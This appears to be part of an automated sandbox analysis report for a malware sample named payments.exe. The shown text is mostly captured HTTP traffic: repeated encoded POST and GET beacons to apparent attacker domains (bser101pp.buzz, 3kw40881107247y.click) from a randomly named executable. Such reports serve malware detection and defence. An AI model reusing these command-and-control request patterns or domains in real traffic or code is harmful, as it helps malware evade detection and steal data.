                                                                                                                        Data Raw: 62 42 77 3d 6a 72 4c 2f 61 36 58 79 35 4c 75 51 6f 6b 54 76 35 53 38 2f 37 34 42 56 35 59 4d 62 53 2b 4f 6a 50 6e 35 4e 4a 6f 55 31 59 55 6f 68 55 51 6e 67 38 45 61 75 2b 4a 69 44 49 2b 73 37 36 49 61 2f 4d 76 33 34 41 4c 45 44 32 37 33 52 46 6b 6d 35 68 50 56 36 6f 6c 6c 58 37 71 33 37 37 73 66 32 47 65 47 59 61 69 58 59 64 66 73 5a 72 55 71 71 4b 6d 69 6c 42 69 4b 31 5a 44 47 30 38 4d 43 78 79 45 78 6a 45 75 63 65 57 4d 4d 76 5a 46 4b 55 79 4c 64 48 4a 6c 64 67 5a 66 58 74 74 42 32 49 43 37 4b 47 31 68 68 37 72 6e 63 75 74 59 6f 6e 46 2b 73 76 4c 6b 42 5a 6f 66 2b 54
                                                                                                                        Data Ascii: bBw=jrL/a6Xy5LuQokTv5S8/74BV5YMbS+OjPn5NJoU1YUohUQng8Eau+JiDI+s76Ia/Mv34ALED273RFkm5hPV6ollX7q377sf2GeGYaiXYdfsZrUqqKmilBiK1ZDG08MCxyExjEuceWMMvZFKUyLdHJldgZfXttB2IC7KG1hh7rncutYonF+svLkBZof+T
                                                                                                                        Nov 21, 2024 16:23:58.133624077 CET957INHTTP/1.1 404 Not Found
                                                                                                                        Date: Thu, 21 Nov 2024 15:23:57 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8WBi5HM25E7enDUhJaqU7xdSjqHih%2FJoFVuWCuDtvKpCXnd8kLkuchCW%2FpCMVWvh9dq%2B74vhcKo1nNLQG0hml%2FZT3xvV1%2Fw2x9RH3MgOffCaAaJ%2BjHoyH3SaxwhG40%2FvDeHGgOQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 8e61af165b311811-EWR
                                                                                                                        Content-Encoding: gzip
                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=3020&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=598&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                        Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                        Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        50192.168.2.950024104.21.58.90806608C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 21, 2024 16:23:59.469146967 CET622OUTPOST /crrp/ HTTP/1.1
                                                                                                                        Host: www.bser101pp.buzz
                                                                                                                        Accept: */*
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Origin: http://www.bser101pp.buzz
                                                                                                                        Cache-Control: max-age=0
                                                                                                                        Content-Length: 216
                                                                                                                        Connection: close
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Referer: http://www.bser101pp.buzz/crrp/
                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                        Data Raw: 62 42 77 3d 6a 72 4c 2f 61 36 58 79 35 4c 75 51 70 46 44 76 70 43 41 2f 71 6f 42 57 38 59 4d 62 49 4f 50 4c 50 6e 39 4e 4a 71 6b 66 5a 6d 63 68 54 79 2f 67 39 46 61 75 33 5a 69 44 44 65 73 45 30 6f 61 34 4d 76 72 77 41 4f 6b 44 32 36 58 52 46 6d 75 35 68 34 35 6c 6f 31 6c 76 32 4b 33 35 6b 38 66 32 47 65 47 59 61 6a 33 2b 64 66 30 5a 72 46 61 71 4c 45 61 69 49 43 4b 30 52 6a 47 30 32 63 43 31 79 45 78 37 45 73 6f 34 57 4f 30 76 5a 45 36 55 38 2f 4a 45 53 56 64 69 48 76 57 41 6b 69 44 63 4f 63 53 50 30 51 4a 67 71 47 4d 4e 75 35 55 35 55 4d 6c 30 65 7a 42 2b 76 34 33 37 34 4a 58 71 35 37 30 59 61 68 6f 32 49 6f 50 4b 44 66 35 4f 53 67 3d 3d
                                                                                                                        Data Ascii: bBw=jrL/a6Xy5LuQpFDvpCA/qoBW8YMbIOPLPn9NJqkfZmchTy/g9Fau3ZiDDesE0oa4MvrwAOkD26XRFmu5h45lo1lv2K35k8f2GeGYaj3+df0ZrFaqLEaiICK0RjG02cC1yEx7Eso4WO0vZE6U8/JESVdiHvWAkiDcOcSP0QJgqGMNu5U5UMl0ezB+v4374JXq570Yaho2IoPKDf5OSg==
                                                                                                                        Nov 21, 2024 16:24:00.716937065 CET949INHTTP/1.1 404 Not Found
                                                                                                                        Date: Thu, 21 Nov 2024 15:24:00 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wKCL1WGTcn7vM9epVkZymmt%2FLL%2BGkQUmigAT4BMUFvuQihnl2jUSGJCFnbOG4pytmvpjxYLwi0Eo9SwGHkSB8gcCQnHR9HPLL%2F3yzGxddhuvrZa8JDyva2JSn5ifL5ZTvxNpcb8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 8e61af26ab340f65-EWR
                                                                                                                        Content-Encoding: gzip
                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1598&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=622&delivery_rate=0&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                        Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                        Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        51192.168.2.950025104.21.58.90806608C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 21, 2024 16:24:02.145051003 CET1635OUTPOST /crrp/ HTTP/1.1
                                                                                                                        Host: www.bser101pp.buzz
                                                                                                                        Accept: */*
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Origin: http://www.bser101pp.buzz
                                                                                                                        Cache-Control: max-age=0
                                                                                                                        Content-Length: 1228
                                                                                                                        Connection: close
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Referer: http://www.bser101pp.buzz/crrp/
                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                        Data Raw: 62 42 77 3d 6a 72 4c 2f 61 36 58 79 35 4c 75 51 70 46 44 76 70 43 41 2f 71 6f 42 57 38 59 4d 62 49 4f 50 4c 50 6e 39 4e 4a 71 6b 66 5a 6d 6b 68 54 48 6a 67 79 47 69 75 6c 4a 69 44 4f 2b 73 2f 30 6f 62 6b 4d 76 7a 30 41 4f 6f 31 32 2b 6e 52 47 46 32 35 70 73 74 6c 6a 31 6c 76 2f 71 33 30 37 73 65 73 47 65 57 63 61 69 62 2b 64 66 30 5a 72 48 53 71 64 6d 69 69 45 69 4b 31 5a 44 47 52 38 4d 44 69 79 45 70 42 45 73 74 46 58 36 41 76 5a 6b 71 55 78 71 64 45 50 6c 64 73 47 76 57 59 6b 69 66 71 4f 59 36 44 30 51 39 47 71 42 41 4e 2b 73 31 50 44 4d 74 66 64 67 56 68 71 37 72 6c 77 2f 4c 75 2b 37 31 45 4e 41 73 43 51 74 4f 4b 47 4c 67 59 4f 33 41 43 79 33 45 79 79 2b 42 56 6e 51 65 2b 35 59 33 58 49 42 4d 5a 75 69 79 6a 53 45 56 66 4d 46 33 67 68 6e 7a 4b 78 6d 7a 31 68 74 36 43 47 62 2b 6a 34 50 53 4f 69 67 77 70 35 68 64 6f 64 38 56 63 57 49 41 42 74 4f 2b 4d 6e 37 49 46 74 66 2b 79 6e 77 53 52 61 69 54 2b 4e 70 65 36 4c 46 68 38 63 34 35 44 63 38 58 49 43 59 76 57 43 31 56 66 44 63 6d 6b 62 79 55 52 31 48 [TRUNCATED]
                                                                                                                        Data Ascii: bBw=jrL/a6Xy5LuQpFDvpCA/qoBW8YMbIOPLPn9NJqkfZmkhTHjgyGiulJiDO+s/0obkMvz0AOo12+nRGF25pstlj1lv/q307sesGeWcaib+df0ZrHSqdmiiEiK1ZDGR8MDiyEpBEstFX6AvZkqUxqdEPldsGvWYkifqOY6D0Q9GqBAN+s1PDMtfdgVhq7rlw/Lu+71ENAsCQtOKGLgYO3ACy3Eyy+BVnQe+5Y3XIBMZuiyjSEVfMF3ghnzKxmz1ht6CGb+j4PSOigwp5hdod8VcWIABtO+Mn7IFtf+ynwSRaiT+Npe6LFh8c45Dc8XICYvWC1VfDcmkbyUR1HU4HEczGeb3tipfw5sPM8Iws5zzUJVdOZZo8gxrThL5Lp8XWfS5CkIn7Ls8iH2L0m7X80LuFfQKndGx35hM5UCNitvTvPeM7oCTGk5DvVyJevI6d75q0+T0dxItKzUMvb/ipak4FHNi6in1gG69eeGvAb/2oeXoZm+jIpHuldxLzv8dwjx70aqZHU8kPm5MW0LVmm5+pwxby6ptNsrDiGnsCiH6pfo0VdAHPcZkSw5z8rZn1oPW1d+2Av4FzHFCaWhi1SA2bgdWCZ7DrGmgL85Zqwfz5o4lsBQ8u+U0L0Fz4hZJoP/ittnKW6obOs17A12qoOl3ZvCDtHf5+14evSz7bkjNlcRtqUOQ4PlApHqPS9TRWfB6pkqvIPX3H0OZ4Wu7tZF52P//YkJc3UseZQ/Ieeg8dgKbKx34k9wsxkjctldmC9DIYaD8pS0XD+5R9tXl4EGMRYmAPi0YjK8IzVENTSdbtbLzwymnw4g9AjXtTkiarCOKPo/4ByqkoSC/ML08zmKAxne63XKV1P/D1EyXRxAlr0+cHh1H1VXNCQkj3VlMmFgfjBNYQ+S/E6f/Qv532L67CZ9YucwJAwoLOo9hzND9A8hC8Tb1pQMU3IIvhzqeDU2MCyq5KOjb8POvj2EB68jrYP6USBGUzxN6txCe+5WveWlWp+Re [TRUNCATED]
                                                                                                                        Nov 21, 2024 16:24:03.413825035 CET952INHTTP/1.1 404 Not Found
                                                                                                                        Date: Thu, 21 Nov 2024 15:24:03 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Zghla1s3RrQE4kuM1%2B3991YIerDBPGjH2R%2BBz6HRD8T9WCJLBenDSLHF20rYFtR8KgMyTdE6rrzQEoCVs88vWIrfFPmO1h9PnqeeljTiqrhw%2BB41r%2ByVTIUCnXTXdIlAgewQeAI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 8e61af378bd541e1-EWR
                                                                                                                        Content-Encoding: gzip
                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=4646&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1635&delivery_rate=0&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                        Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                        Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        52192.168.2.950026104.21.58.90806608C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 21, 2024 16:24:04.807034969 CET340OUTGET /crrp/?bBw=upjfZKq4/ZGfoF/T3gRqvMsDposBEsbCPxdbSO05fQ4zSiP5+UGAxJqZOtAYqZWCOef+BeM6z+3JdRqWgtx/gAtazJHp7Z7XNdyJQnSFd8YmyBfIfQ==&PBk=f4VDN8Bp14IhbV HTTP/1.1
                                                                                                                        Host: www.bser101pp.buzz
                                                                                                                        Accept: */*
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Connection: close
                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                        Nov 21, 2024 16:24:05.987823963 CET1236INHTTP/1.1 404 Not Found
                                                                                                                        Date: Thu, 21 Nov 2024 15:24:05 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CtvCmy8vM6qq11k%2FxHyaNqMnLNvW354ybLYiIlQYDQEDf%2BVbpPdb%2BoHa0ClLpKhWHEcurvJFwK7FuKiYlHRseloyzTw%2BsDs%2Fgxmsf%2F5hFKlT5KopH5R9NRZbWKM1NzIW%2FVTDoOk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 8e61af47ceb143a9-EWR
                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1631&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=340&delivery_rate=0&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                        Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 [TRUNCATED]
                                                                                                                        Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page
                                                                                                                        Nov 21, 2024 16:24:05.987845898 CET79INData Raw: 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                        Data Ascii: -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        53192.168.2.950027172.67.192.207806608C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 21, 2024 16:24:11.483397007 CET619OUTPOST /6wln/ HTTP/1.1
                                                                                                                        Host: www.3kw40881107247y.click
                                                                                                                        Accept: */*
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Origin: http://www.3kw40881107247y.click
                                                                                                                        Cache-Control: max-age=0
                                                                                                                        Content-Length: 192
                                                                                                                        Connection: close
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Referer: http://www.3kw40881107247y.click/6wln/
                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                        Data Raw: 62 42 77 3d 74 6d 53 6b 58 53 65 6f 51 79 6b 58 78 5a 70 35 6e 42 56 39 79 4c 63 64 62 41 47 51 62 59 38 6b 6a 56 55 72 77 32 48 6c 45 6a 35 79 78 4a 68 44 4b 55 62 4a 34 31 59 66 59 50 66 6d 76 64 6c 5a 76 4c 66 61 39 4b 6f 79 46 33 2b 30 39 74 56 41 64 75 49 42 43 76 66 47 77 44 47 65 6c 45 6f 55 51 62 56 2f 30 4f 79 57 31 39 2f 70 59 41 49 36 36 72 53 34 75 4d 43 64 2b 33 32 46 37 2b 6c 70 6c 65 39 65 47 6f 55 6b 78 34 45 46 4f 66 32 69 52 35 38 44 31 75 54 35 6b 45 36 45 61 42 6e 52 59 57 45 4d 7a 57 35 7a 51 32 36 37 35 6e 56 5a 57 58 77 62 7a 36 55 45 4c 33 67 61
                                                                                                                        Data Ascii: bBw=tmSkXSeoQykXxZp5nBV9yLcdbAGQbY8kjVUrw2HlEj5yxJhDKUbJ41YfYPfmvdlZvLfa9KoyF3+09tVAduIBCvfGwDGelEoUQbV/0OyW19/pYAI66rS4uMCd+32F7+lple9eGoUkx4EFOf2iR58D1uT5kE6EaBnRYWEMzW5zQ2675nVZWXwbz6UEL3ga
                                                                                                                        Nov 21, 2024 16:24:12.643196106 CET950INHTTP/1.1 404 Not Found
                                                                                                                        Date: Thu, 21 Nov 2024 15:24:12 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kfbhwjt07m%2BSUxAFwTfjhAKJZh5fc9GJ4lR9Poz%2FPlfqOqlDIhbdY3wRiLnEwVChJ2zGPWpEa3InWM1%2BtXsuT7168fhL93VIE4zJi0PaLIE3ejng4nVdZXQsqoKLWt2mw85KKpfZXmkF191g"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 8e61af71c8a23300-EWR
                                                                                                                        Content-Encoding: gzip
                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1981&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=619&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                        Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a
                                                                                                                        Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$
                                                                                                                        Nov 21, 2024 16:24:12.645181894 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                        Data Ascii: 0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                        54192.168.2.950028172.67.192.20780
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 21, 2024 16:24:15.373236895 CET643OUTPOST /6wln/ HTTP/1.1
                                                                                                                        Host: www.3kw40881107247y.click
                                                                                                                        Accept: */*
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Origin: http://www.3kw40881107247y.click
                                                                                                                        Cache-Control: max-age=0
                                                                                                                        Content-Length: 216
                                                                                                                        Connection: close
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Referer: http://www.3kw40881107247y.click/6wln/
                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                        Data Raw: 62 42 77 3d 74 6d 53 6b 58 53 65 6f 51 79 6b 58 78 36 68 35 71 47 42 39 6e 62 63 63 46 51 47 51 52 34 39 74 6a 56 49 72 77 33 54 31 45 57 70 79 78 70 52 44 62 6c 62 4a 31 56 59 66 58 76 66 76 68 39 6c 73 76 4c 53 76 39 4c 55 79 46 7a 75 30 39 6f 78 41 65 5a 30 41 44 2f 66 41 37 6a 47 63 68 45 6f 55 51 62 56 2f 30 4f 32 77 31 35 54 70 59 51 34 36 37 50 4f 33 6b 73 43 43 35 33 32 46 2f 2b 6c 31 6c 65 38 4c 47 70 59 65 78 36 38 46 4f 65 6d 69 52 73 63 43 36 75 54 37 35 30 36 54 63 6a 79 57 41 32 6b 53 39 6c 42 79 46 77 75 62 33 6d 70 48 48 6c 35 41 6d 74 55 6a 4d 51 70 79 4d 4f 71 6c 63 41 32 48 75 6e 4f 42 62 33 77 75 6a 52 58 66 73 41 3d 3d
                                                                                                                        Data Ascii: bBw=tmSkXSeoQykXx6h5qGB9nbccFQGQR49tjVIrw3T1EWpyxpRDblbJ1VYfXvfvh9lsvLSv9LUyFzu09oxAeZ0AD/fA7jGchEoUQbV/0O2w15TpYQ467PO3ksCC532F/+l1le8LGpYex68FOemiRscC6uT7506TcjyWA2kS9lByFwub3mpHHl5AmtUjMQpyMOqlcA2HunOBb3wujRXfsA==
                                                                                                                        Nov 21, 2024 16:24:16.492039919 CET955INHTTP/1.1 404 Not Found
                                                                                                                        Date: Thu, 21 Nov 2024 15:24:16 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WDCHY61NjwdLKUF34ZwERuDzBLZfLMRMQrAaY8XqvTqomcU%2Ft%2BiqhtD4WX6UiXvD9lqXNVanh2XAU23gkqBsrM3h03B8qUlYifo5ZO9Solb0SqGb9HRyyq68sLUZPuD1%2BkCFcSifKWczICT5"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 8e61af89d93a15a3-EWR
                                                                                                                        Content-Encoding: gzip
                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1578&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=643&delivery_rate=0&cwnd=109&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                        Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                        Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0


                                                                                                                        Statistics

                                                                                                                        CPU Usage

                                                                                                                        Click to jump to process

                                                                                                                        Memory Usage

                                                                                                                        Click to jump to process

                                                                                                                        High Level Behavior Distribution

                                                                                                                        Click to dive into process behavior distribution

                                                                                                                        Behavior

                                                                                                                        Click to jump to process

                                                                                                                        System Behavior

                                                                                                                        General

                                                                                                                        Target ID:0
                                                                                                                        Start time:10:20:06
                                                                                                                        Start date:21/11/2024
                                                                                                                        Path:C:\Users\user\Desktop\payments.exe
                                                                                                                        Wow64 process (32bit):true
